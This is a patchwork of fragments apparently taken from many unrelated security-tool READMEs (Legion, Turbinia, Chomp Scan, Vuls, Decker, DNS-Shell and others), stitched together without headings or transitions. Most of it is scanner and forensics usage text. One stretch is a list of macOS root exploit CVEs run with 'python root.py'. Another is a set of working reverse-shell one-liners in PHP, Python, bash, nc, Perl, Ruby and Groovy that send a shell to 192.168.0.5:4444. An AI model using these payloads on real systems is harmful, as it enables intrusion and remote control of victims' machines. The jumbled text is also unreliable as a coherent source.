usage: Cuteit.py [-h] [--disable-coloring] ip

positional arguments:
  ip                  IP you want to convert

optional arguments:
  -h, --help          show this help message and exit
  --disable-coloring  Disable colored printing

import Cuteit
convert = Cuteit.lib(ip)
print(convert.hex)

• Run full linux distros or specific applications on top of Android.
• Install and uninstall like a regular app.
• No root required.

Using single-click apps:

1. Click an app.
2. Fill out the required information.
3. You're good to go!

Using user-defined custom sessions:

1. Define a session - This describes what filesystem you are going to use, and what kind of service you want to use when connecting to it (ssh or vnc).
2. Define a filesystem - This describes what distribution of Linux you want to install.
3. Once defined, just tap on the session to start up. This will download necessary assets, setup the filesystem, start the server, and connect to it. This will take several minutes for the first start up, but will be quicker afterwards.

Managing Packages

Installing A Desktop

_build="/mnt/system-backup.tgz"

_base="/mnt/minimal-base"

If you do not specify this parameter, the temporary system will be downloaded automatically.

_disk="/dev/vda"

./bin/reload.sh --base "$_base" --build "$_build" --disk "$_disk"

• takeover.sh

• Automatic recon and scanning with NMAP, whataweb, nikto, Vulners, Hydra, SMBenum, dirbuster, sslyzer, webslayer and more (with almost 100 auto-scheduled scripts)
• Easy to use graphical interface with rich context menus and panels that allow pentesters to quickly find and exploit attack vectors on hosts
• Modular functionality allows users to easily customize Legion and automatically call their own scripts/tools
• Highly customizable stage scanning for ninja-like IPS evasion
• Automatic detection of CPEs (Common Platform Enumeration) and CVEs (Common Vulnerabilities and Exposures)
• Realtime autosaving of project results and tasks

• Refactored from Python 2.7 to Python 3.6 and the elimination of depreciated and unmaintained libraries
• Upgraded to PyQT5, increased responsiveness, less buggy, more intuitive GUI that includes features like:
  • Task completion estimates
  • 1-Click scan lists of ips, hostnames and CIDR subnets
  • Ability to purge results, rescan hosts and delete hosts
  • Granual NMAP scanning options
• Support for hostname resolution and scanning of vhosts/sni hosts
• Revise process queuing and execution routines for increased app reliability and performance
• Simplification of installation with dependency resolution and installation routines
• Realtime project autosaving so in the event some goes wrong, you will not loose any progress!
• Docker container deployment option
• Supported by a highly active development team

git clone https://github.com/GoVanguard/legion.git
cd legion
sudo chmod +x startLegion.sh
sudo ./startLegion.sh

git clone https://github.com/GoVanguard/legion.git
cd legion/docker
sudo chmod +x runIt.sh
sudo ./runIt.sh

• Refactored Python 3.6+ codebase, added feature set and ongoing development of Legion is credited to GoVanguard
• The initial Sparta Python 2.7 codebase and application design is credited SECFORCE.
• Several additional PortActions, PortTerminalActions and SchedulerSettings are credited to batmancrew.
• The nmap XML output parsing engine was largely based on code by yunshu, modified by ketchup and modified SECFORCE.
• ms08-067_check script used by smbenum.sh is credited to Bernardo Damele A.G.
• Legion relies heavily on nmap, hydra, python, PyQt, SQLAlchemy and many other tools and technologies so we would like to thank all of the people involved in the creation of those.

• Start Turbinia server component with turbiniactl server command
• Start one or more Turbinia workers with turbiniactl psqworker
• Send evidence to be processed from the turbinia client with turbiniactl ${evidencetype}
• Check status of running tasks with turbiniactl status

$ turbiniactl --help
usage: turbiniactl [-h] [-q] [-v] [-d] [-a] [-f] [-o OUTPUT_DIR] [-L LOG_FILE]
                   [-r REQUEST_ID] [-R] [-S] [-C] [-V] [-D]
                   [-F FILTER_PATTERNS_FILE] [-j JOBS_WHITELIST]
                   [-J JOBS_BLACKLIST] [-p POLL_INTERVAL] [-t TASK] [-w]
<command> ...

optional arguments:
  -h, --help            show this help message and exit
  -q, --quiet           Show minimal output
  -v, --verbose         Show verbose output
  -d, --debug           Show debug output
  -a, --all_fields      Show all task status fields in output
  -f, --force_evidence  Force evidence processing request in potentially
                        unsafe conditions
  -o OUTPUT_DIR, --output_dir OUTPUT_DIR
                        Directory path for output
  -L LOG_FILE, --log_file LOG_FILE
                        Log file
  -r REQUEST_ID, --request_id REQUEST_ID
                        Create new requests with this Request ID
  -R, --run_local       Run completely locally without any server or other
                        infrastructure. This can be used to run one-off Tasks
                        to process data locally.
  -S, --server          Run Turbinia Server indefinitely
  -C, --use_celery      Pass this flag when using Celery/Kombu for task
                        queuing and messaging (instead of Google PSQ/pubsub)
  -V, --version         Show the version
  -D, --dump_json       Dump JSON output of Turbinia Request instead of
                        sending it
  -F FILTER_PATTERNS_FILE, --filter_patterns_file FILTER_PATTERNS_FILE
                        A file containing newline separated string patterns to
                        filter text based evidence files with (in extended
grep regex format). This filtered output will be in
                        addition to the complete output
  -j JOBS_WHITELIST, --jobs_whitelist JOBS_WHITELIST
                        A whitelist for Jobs that we will allow to run (note
                        that it will not force them to run).
  -J JOBS_BLACKLIST, --jobs_blacklist JOBS_BLACKLIST
                        A blacklist for Jobs we will not allow to run
  -p POLL_INTERVAL, --poll_interval POLL_INTERVAL
                        Number of seconds to wait between polling for task
                        state info
  -t TASK, --task TASK  The name of a single Task to run locally (must be used
                        with --run_local.
  -w, --wait            Wait to exit until all tasks for the given request
                        have completed

Commands:
<command>
    rawdisk             Process RawDisk as Evidence
    googleclouddisk     Process Google Cloud Persistent Disk as Evidence
    googleclouddiskembedded
                        Process Google Cloud Persistent Disk with an embedded
                        raw disk image as Evidence
    directory           Process a directory as Evidence
    listjobs            List all available jobs
    psqworker           Run PSQ worker
    celeryworker        Run Celery worker
    status              Get Turbinia Task status
    server              Run Turbinia Server

$ ./turbiniactl rawdisk -h
usage: turbiniactl rawdisk [-h] -l LOCAL_PATH [-s SOURCE] [-n NAME]

optional arguments:
  -h, --help            show this help message and exit
  -l LOCAL_PATH, --local_path LOCAL_PATH
                        Local path to the evidence
  -s SOURCE, --source SOURCE
                        Description of the source of the evidence
  -n NAME, --name NAME  Descriptive name of the evidence

• Installation
• How it works
• Contributing to Turbinia
• Developing new Tasks
• FAQ
• Debugging and Common Errors

• Turbinia currently assumes that Evidence is equally available to all worker nodes (e.g. through locally mapped storage, or through attachable persistent Google Cloud Disks, etc).
• Not all evidence types are supported yet
• Still only a small number of processing job types supported, but more are being developed.

• dnscan
• subfinder
• sublist3r
• massdns + altdns

• aquatone

• masscan and/or nmap
• nmap output styled with nmap-bootstrap-xsl

• subjack
• bfac
• whatweb
• wafw00f
• nikto

• ffuf
• gobuster
• dirsearch

• altdns-words.txt - 240 words - Used for creating domain permutations for masscan to resolve. Borrowed from altdns.
• interesting.txt - 43 words - A list I created of potentially interesting words appearing in domain names. Provide your own interesting words list with the -X flag.

chomp-scan.sh -u example.com -a d short -cC large -p -o path/to/directory

Usage of Chomp Scan:
        -u domain
                 (required) Domain name to scan. This should not include a scheme, e.g. https:// or http://.
        -d wordlist
                 (optional) The wordlist to use for subdomain enumeration. Three built-in lists, short, long, and huge can be used, as well as the path to a custom wordlist. The default is short.
        -c
                 (optional) Enable content discovery phase. The wordlist for this option defaults to short if not provided.
        -C wordlist
                 (optional) The wordlist to use for content discovery. Five built-in lists, small, medium, large, xl, and xxl can be used, as well as the path to a custom wordlist. The default is small.
        -s
                 (optional) Enable screenshots using Aquatone.
        -i
                 (optional) Enable information gathering phase, using subjack, bfac, whatweb, wafw00f, and nikto.
        -p
                 (optional) Enable portscanning phase, using masscan (run as root) and nmap.
        -I
                 (optional) Enable interactive mode. This allows you to select certain tool options and inputs interactively. This cannot be run with -D.
        -D
                 (optional) Enable default non-interactive mode. This mode uses pre-selected defaults and requires no user interaction or options. This cannot be run with -I.
                            Options: Subdomain enumeration wordlist: short.
                                     Content discovery wordlist: small.
                                     Aquatone screenshots: yes.
                                     Portscanning: yes.
                                     Information gathering: yes.
                                     Domains to scan: all unique discovered.
        -b wordlist
                 (optional) Set custom domain blacklist file.
        -X wordlist
                 (optional) Set custom interesting word list.
        -o directory
                 (optional) Set custom output directory. It must exist and be writable.
        -a
                 (optional) Use all unique discovered domains for scans, rather than interesting domains. This cannot be used with -A.
        -A
                 (optional, default) Use only interesting discovered domains for scans, rather than all discovered domains. This cannot be used with -a.
  -H
                 (optional) Use HTTP for connecting to sites instead of HTTPS.
        -h
                 (optional) Display this help page.

• Adding a config file, for more granular customization of tools and parameters
• Adding testing/support for Ubuntu/Debian
• A possible Python re-write (and maybe a Go re-write after that!)
• The generation of an HTML report, similar to what aquatone provides

• Google
• Bing
• DuckDuckGo
• Yahoo
• Ask

$ export GO111MODULE=on 
$ go get ./...
$ go run goca/goca.go -h

$ docker build -t gocaio/goca /path/to/goca
$ docker run gocaio/goca -h

• Contributing

• 1.0 First Release

• Whois Lookup
• DNSmap
• Nmap
• Dmitry
• Theharvester
• Load Balancing Detector
• SSLyze
• Automater
• Ua Tester
• Gobuster
• Grabber
• Parsero
• Uniscan
• And More Tool Soon

• Do not scan government and private IT objects without legal permission.
• Do At Your Own Risk

• CVE-2008-2830
• CVE-2015-3760
• CVE-2015-5889
• CVE-2017-13872
• AppleScript Dynamic Phishing
• Sudo Piggyback Link

python root.py

• System administrator will have to constantly watch out for any new vulnerabilities in NVD(National Vulnerability Database) or similar databases.
• It might be impossible for the system administrator to monitor all the software if there are a large number of software installed in server.
• It is expensive to perform analysis to determine the servers affected by new vulnerabilities. The possibility of overlooking a server or two during analysis is there.

• Informs users of the vulnerabilities that are related to the system.
• Informs users of the servers that are affected.
• Vulnerability detection is done automatically to prevent any oversight.
• Report is generated on regular basis using CRON or other methods. to manage vulnerability.

• Alpine, Ubuntu, Debian, CentOS, Amazon Linux, RHEL, Oracle Linux, SUSE Enterprise Linux and Raspbian, FreeBSD
• Cloud, on-premise, Docker

• NVD
• JVN(Japanese)
• OVAL
  • RedHat
  • Debian
  • Ubuntu
  • SUSE
  • Oracle Linux
• Alpine-secdb
• Red Hat Security Advisories
• Debian Security Bug Tracker
• Commands(yum, zypper, pkg-audit)
  • RHSA/ALAS/ELSA/FreeBSD-SA
• Exploit Database
• Changelog

• Scan without root privilege, no dependencies
• Almost no load on the scan target server
• Offline mode scan with no internet access. (Red Hat, CentOS, OracleLinux, Ubuntu, Debian)

• Scan with root privilege
• Almost no load on the scan target server
• Detect processes affected by update using yum-ps (RedHat, CentOS, Oracle Linux and Amazon Linux)
• Detect processes which updated before but not restarting yet using checkrestart of debian-goodies (Debian and Ubuntu)
• Offline mode scan with no internet access. (RedHat, CentOS, OracleLinux, Ubuntu, Debian)

• Scan with root privilege
• Parses the Changelog
  Changelog has a history of version changes. When a security issue is fixed, the relevant CVE ID is listed. By parsing the changelog and analysing the updates between the installed version of software on the server and the newest version of that software it's possible to create a list of all vulnerabilities that need to be fixed.
• Sometimes load on the scan target server

• User is required to only setup one machine that is connected to other target servers via SSH

• If you don't want the central Vuls server to connect to each server by SSH, you can use Vuls in the Local Scan mode.

• It is possible to acquire the state of the server by connecting via SSH and executing the command.
• Vuls warns when the scan target server was updated the kernel etc. but not restarting it.

• Scan middleware, programming language libraries and framework for vulnerability
• Support software registered in CPE

• Nondestructive testing
• Pre-authorization is NOT necessary before scanning on AWS
  • Vuls works well with Continuous Integration since tests can be run every day. This allows you to find vulnerabilities very quickly.
• Auto generation of configuration file template
  • Auto detection of servers set using CIDR, generate configuration file template
• Email and Slack notification is possible (supports Japanese language)
• Scan result is viewable on accessory software, TUI Viewer on terminal or Web UI (VulsRepo).

• Vuls doesn't update the vulnerable packages.

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

nc -e /bin/sh 192.168.0.5 4444

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm -display 192.168.0.5:4444

• Metasploit-framework must be installed and in your PATH:
  • Msfrpcd
  • Msfvenom
  • Msfdb

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

• Which vulnerabilities are rising and falling in frequency
• Current security concerns, such as the increasing complexity of new apps, the accelerating rate of new versions, and the problem of scale
• Changes in threat landscape from both the client and server sides
• The four major stages of vulnerability analysis
• Vulnerability findings by type and severity
• An analysis of each discovered vulnerability in terms of how it works, its statistical status and pointers for remediation.

1. AP module and Data flow catcher: Catch network traffic.
2. Traffic analying engine: Extract characteristics from network traffic and compare them with device fingerprint database.
3. Device fingerprint database: Normal network behaviors of each devices, based on whitelist. Call APIs of 360 threat intelligence database (https://ti.360.net/).
4. Web server: There may be a web server in the second generation.

                                           ___________________       ___________________
                                          |                   |     |                   |
                                          | data_flow_catcher |<----| devices connected |
                                          |___________________|     |___________________|
¦
¦
 ____________________________              ____↓________________  
|                            |            |                     |
| device_fingerprint_databse |<---------> | flow_analyze_engine |
|____________________________|       ¦    |_____________________|
¦         ↑
¦         ¦
 __________________________________  ¦     ____↓_______              _________________
|                                  | ¦    |            |            |                 |
| 360 threat intelligence database |<-    | web_server |<-----------| user interfaces |
|__________________________________|      |____________|            |_________________|

$ python hostintel.py -h
usage: hostintel.py [-h] [-a] [-d] [-v] [-p] [-s] [-c] [-t] [-o] [-i] [-r]
                    ConfigurationFile InputFile

Modular application to look up host intelligence information. Outputs CSV to
STDOUT. This application will not output information until it has finished all
of the input.

positional arguments:
  ConfigurationFile     Configuration file
  InputFile             Input file, one host per line (IP, domain, or FQDN
                        host name)

optional arguments:
  -h, --help            show this help message and exit
  -a, --all             Perform All Lookups.
  -d, --dns             DNS Lookup.
  -v, --virustotal      VirusTotal Lookup.
  -p, --passivetotal    PassiveTotal Lookup.
  -s, --shodan          Shodan Lookup.
  -c, --censys          Censys Lookup.
  -t, --threatcrowd     ThreatCrowd Lookup.
  -o, --otx             OTX by AlienVault Lookup.
  -i, --isc             Internet Storm Center DShield Lookup.
  -r, --carriagereturn  Use carriage returns with new lines on csv.

$ pip install -r requirements.txt

$ pip install requests[security]

$ python hostintel.py myconfigfile.conf myhosts.txt -a > myoutput.csv

$ python hostintel.py local/config.conf sampledata/smalllist.txt -a > sampledata/smalllist.csv
*** Processing 8.8.8.8 ***
*** Processing 8.8.4.4 ***
*** Processing 192.168.1.1 ***
*** Processing 10.0.0.1 ***
*** Processing google.com ***
*** Processing 212.227.247.242 ***
*** Writing Output ***

$ python hostintel.py local/config.conf sampledata/largerlist.txt -a > sampledata/largerlist.csv
*** Processing 114.34.84.13 ***
*** Processing 116.102.34.212 ***
*** Processing 118.75.180.168 ***
*** Processing 123.195.184.13 ***
*** Processing 14.110.216.236 ***
*** Processing 14.173.147.69 ***
*** Processing 14.181.192.151 ***
*** Processing 146.120.11.66 ***
*** Processing 163.172.149.131 ***

...

*** Processing 54.239.26.180 ***
*** Processing 62.141.39.155 ***
*** Processing 71.6.135.131 ***
*** Processing 72.30.2.74 ***
*** Processing 74.125.34.101 ***
*** Processing 83.31.179.71 ***
*** Processing 85.25.217.155 ***
*** Processing 93.174.93.94 ***
*** Writing Output ***

• GeoLite2 (No network I/O required)
  • http://www.maxmind.com
• DNS (Network I/O required)
  • https://github.com/rthalley/dnspython
• VirusTotal (Public API key and network I/O required, throttled when appropriate)
  • http://www.virustotal.com
• PassiveTotal (API key, username, and network I/O required)
  • http://www.passivetotal.com
• Shodan (API key and network I/O required)
  • http://www.shodan.io
• Censys (API key, username, and network I/O required)
  • http://www.censys.io
• ThreatCrowd (Network I/O required, throttled when appropriate)
  • http://www.threatcrowd.org
• OTX by AlienVault (API key and network I/O required)
  • https://otx.alienvault.com
• Internet Storm Center (Network I/O required)
  • https://isc.sans.edu

• The GeoIP2 Python library
  • https://github.com/maxmind/GeoIP2-python
• The Python DNS library
  • https://github.com/rthalley/dnspython
  • Foundation of DNS lookups inspired by http://www.iodigitalsec.com/performing-dns-queries-python/
• The VirusTotal Python library
  • https://github.com/blacktop/virustotal-api
• The Shodan Python library
  • http://shodan.readthedocs.io/en/latest/
  • https://github.com/achillean/shodan-python
• The Censys Python library
  • https://github.com/censys/censys-python
  • https://www.censys.io/api
• The PassiveTotal Python library
  • https://passivetotal.readthedocs.io/en/latest/
  • https://github.com/passivetotal/python_api
• The ThreatCrowd Python library
  • https://github.com/threatcrowd/ApiV2
  • https://github.com/jheise/threatcrowd_api
• The OTX Python Library
  • https://github.com/AlienVault-Labs/OTX-Python-SDK
  • https://otx.alienvault.com/api/
• The Internet Storm Center DShield Python Library
  • https://github.com/rshipp/python-dshield
  • https://isc.sans.edu/api/

• Data-path with full lock-free architecture.
• Preallocated pools of socket buffers.
• Compliant with a plethora of network devices drivers.
• Rx and Tx line-rate on 10-Gbit links (14,8 Mpps), tested with Intel ixgbe vanilla drivers.
• Transparent support of kernel threads for asynchronous packets transmission.
• Transmission with active timestamping.
• Groups of sockets which enable concurrent monitoring of multiple multi-threaded applications.
• Per-group packet steering through randomized hashing or deterministic classification.
• Per-group Berkeley and VLAN filters.
• User-space libraries for C, C++11-14 and Haskell language.
• Functional engine for in-kernel packet processing with pfq-lang.
• pfq-lang eDLS for C++11-14 and Haskell language.
• pfq-lang compiler used to parse and compile pfq-lang programs.
• Accelerated pcap library for legacy applications (line-speed tested with captop).
• I/O user<->kernel memory-mapped communications allocated on top of HugePages.
• pfqd daemon used to configure and parallelize (pcap) legacy applications.
• pfq-omatic script that automatically accelerates vanilla drivers.

• "PFQ: a Novel Engine for Multi-Gigabit Packet Capturing With Multi-Core Commodity Hardware": Best-Paper-Award at PAM2012, paper avaiable from here
• "A Purely Functional Approach to Packet Processing": ANCS 2014 Conference (October 2014, Marina del Rey)
• "Network Traffic Processing with PFQ": JSAC-SI-MT/IEEE journal Special Issue on Measuring and Troubleshooting the Internet (March 2016)
• "Enabling Packet Fan--Out in the libpcap Library for Parallel Traffic Processing": Network Traffic Measurement and Analysis Conference (TMA 2017)
• "A Pipeline Functional Language for Stateful Packet Processing": IEEE International Workshop on NEtwork Accelerated FunctIOns (NEAF-IO '17)
• "The Acceleration of OfSoftSwitch": IEEE Conference on Network Function Virtualization and Software Defined Networks (NFV-SDN '17)

• "Functional Network Programming" at Tyrrhenian International Workshop on Digital Communication - (Sep. 2016)
• "Software Accelerations for Network Applications" at NetV IRISA / Technicolor Workshop on Network Virtualization (Feb. 2017)

// variables are pulled from environment
//   ex: DECKER_TARGET_HOST
// they will be available throughout the config files as var.*
//   ex: ${var.target_host}
variable "target_host" {
  type = "string"
}

// resources refer to plugins
// resources need unique names so plugins can be used more than once
// they are declared with the form: 'resource "plugin_name" "unique_name" {}'
// their outputs will be available to others using the form unique_name.*
//   ex: nmap.443
resource "nmap" "nmap" {
  host = "${var.target_host}"
  plugin_enabled = "true"
}
resource "sslscan" "sslscan" {
  host = "${var.target_host}"
  plugin_enabled = "${nmap.443 == "open"}"
}

variable "target_host" {
  type = "string"
}
resource "nslookup" "nslookup" {
  dns_server = "8.8.4.4"
  host = "${var.target_host}"
}
resource "metasploit" "metasploit" {
  for_each = "${nslookup.ip_address}"
  exploit = "auxiliary/scanner/portscan/tcp"
  options = {
    RHOSTS = "${each.key}/32"
    INTERFACE = "eth0"
  }
}

variable "target_host" {
  type = "string"
}
resource "nslookup" "nslookup" {
  dns_server = "8.8.4.4"
  host = "${var.target_host}"
}
resource "nmap" "nmap" {
  for_each = "${nslookup.ip_address}"
  host = "${each.key}"
}
// for each IP, check if nmap found port 25 open.
// if yes, run metasploit's smtp_enum scanner
resource "metasploit" "metasploit" {
  for_each = "${nslookup.ip_address}"
  exploit = "auxiliary/scanner/smtp/smtp_enum"
  options = {
    RHOSTS = "${each.key}"
  }
  plugin_enabled = "${nmap["${each.key}"].25 == "open"}"
}

1. Output .json files in addition to plain text: export DECKER_OUTPUTS_JSON="true"
2. Output .xml files in addition to plain text: export DECKER_OUTPUTS_XML="true"

A future cracker; a software expert skilled at manipulating cyberspace, especially at circumventing security precautions.

1. Directory named decker-reports where decker will output a file for each plugin executed. The file's name will be {unique_resource_name}.report.txt.
2. examples directory containing decker config files. Mounting this volume allows you to write configs locally using your favorite editor and still run them within the container.

1. DECKER_TARGET_HOST

docker run -it --rm \
  -v "$(pwd)/decker-reports/":/tmp/reports/ \
  -v "$(pwd)/examples/":/decker-config/ \
  -e DECKER_TARGET_HOST=example.com \
 stevenaldinger/decker:kali decker ./decker-config/example.hcl

export DECKER_REPORTS_DIR="$HOME/decker-reports"

export DECKER_TARGET_HOST="<insert hostname here>"

./decker ./examples/example.hcl

1. (on host machine): make docker_build
2. (on host machine): make docker_run (will start docker container and open an interactive bash session)
3. (inside container): dep ensure -v
4. (inside container): make build_all
5. (inside container): make run

input "my_input" {
  type = "string"
  default = "some default value"
}

.
├── build
│   ├── ci/
│   └── package/
├── cmd
│   ├── decker
│   │   └── main.go
│   └── README.md
├── deployments/
├── docs/
├── examples
│   └── example.hcl
├── githooks
│   ├── pre-commit
├── Gopkg.toml
├── internal
│   ├── app
│   │   └── decker
│   │       └── plugins
│   │           ├── a2sv
│   │           │   ├── a2sv.hcl
│   │           │   ├── main.go
│   │           │   └── README.md
│   │           └── ...
│   │               ├── main.go
│   │               ├── README.md
│   │               └── xxx.hcl
│   ├── pkg
│   │   ├── dependencies/
│   │   ├── gocty/
│   │   ├── hcl/
│   │   ├── paths/
│   │   ├── plugins/
│   │   └── reports/
│   └── README.md
├── LICENSE
├── Makefile
├── README.md
└── scripts
├── build-plugins.sh
└── README.md

• cmd/decker/main.go is the driver. Its job is to parse a given config file, load the appropriate plugins based on the file's resource blocks, and run the plugins with the specified inputs.
• examples has a couple example configurations to get you started with decker. If you use the kali docker image (stevenaldinger/decker:kali), all dependencies should be installed for all config files and things should run smoothly.
• internal/pkg is where most of the actual code is. It contains all the packages imported by main.go.
  • dependencies is responsible for building the plugin dependency graph and returning a topologically sorted array that ensures plugins are run in a working order.
  • gocty offers helpers for encoding and decoding go-cty values which are used to handle dynamic input types.
  • hcl is responsible for parsing HCL files, including creating evaluation contexts that let blocks properly decode when they depend on other plugin blocks.
  • paths is responsible for returning file paths for the decker binary, config files, plugin config files, and generated reports.
  • plugins is responsible for determining if plugins are enabled and running them.
  • reports is responsible for writing reports to the file system.
• internal/app/decker/plugins are modular pieces of code written as Golang plugins, implementing a simple interface that allows them to be loaded and called at run-time with inputs and outputs specified in the plugin's config file (also in HCL). An example can be found at internal/app/decker/plugins/nslookup/nslookup.hcl.
• decker config files offer a declarative way to write penetration tests. The manifests are written in HashiCorp Configuration Language 2) and describe the set of plugins to be used in the test as well as their inputs.

• Perform a git clone from our DNS-shell Github page
• DNS-Shell direct mode: sudo python DNS-Shell.py -l -d [Server IP]
• DNS-Shell recursive mode: sudo python DNS-Shell.py -l -r [Domain]